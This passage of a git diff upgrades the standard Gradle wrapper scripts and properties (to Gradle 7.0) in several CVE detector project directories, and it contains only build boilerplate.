+130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/community/detectors/laravel_cve_2021_3129/gradlew.bat b/community/detectors/laravel_cve_2021_3129/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/community/detectors/laravel_cve_2021_3129/gradlew.bat +++ b/community/detectors/laravel_cve_2021_3129/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/community/detectors/metabase_cve_2021_41277/gradle/wrapper/gradle-wrapper.jar b/community/detectors/metabase_cve_2021_41277/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/community/detectors/metabase_cve_2021_41277/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/metabase_cve_2021_41277/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/metabase_cve_2021_41277/gradle/wrapper/gradle-wrapper.properties b/community/detectors/metabase_cve_2021_41277/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/community/detectors/metabase_cve_2021_41277/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/metabase_cve_2021_41277/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/community/detectors/metabase_cve_2021_41277/gradlew b/community/detectors/metabase_cve_2021_41277/gradlew index fbd7c5158..1aa94a426 100755 --- a/community/detectors/metabase_cve_2021_41277/gradlew +++ b/community/detectors/metabase_cve_2021_41277/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/community/detectors/metabase_cve_2021_41277/gradlew.bat b/community/detectors/metabase_cve_2021_41277/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/community/detectors/metabase_cve_2021_41277/gradlew.bat +++ b/community/detectors/metabase_cve_2021_41277/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/community/detectors/metabase_cve_2023_38646/gradle/wrapper/gradle-wrapper.jar b/community/detectors/metabase_cve_2023_38646/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/community/detectors/metabase_cve_2023_38646/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/metabase_cve_2023_38646/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/metabase_cve_2023_38646/gradle/wrapper/gradle-wrapper.properties b/community/detectors/metabase_cve_2023_38646/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/community/detectors/metabase_cve_2023_38646/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/metabase_cve_2023_38646/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/community/detectors/metabase_cve_2023_38646/gradlew b/community/detectors/metabase_cve_2023_38646/gradlew index fbd7c5158..1aa94a426 100755 --- a/community/detectors/metabase_cve_2023_38646/gradlew +++ b/community/detectors/metabase_cve_2023_38646/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses 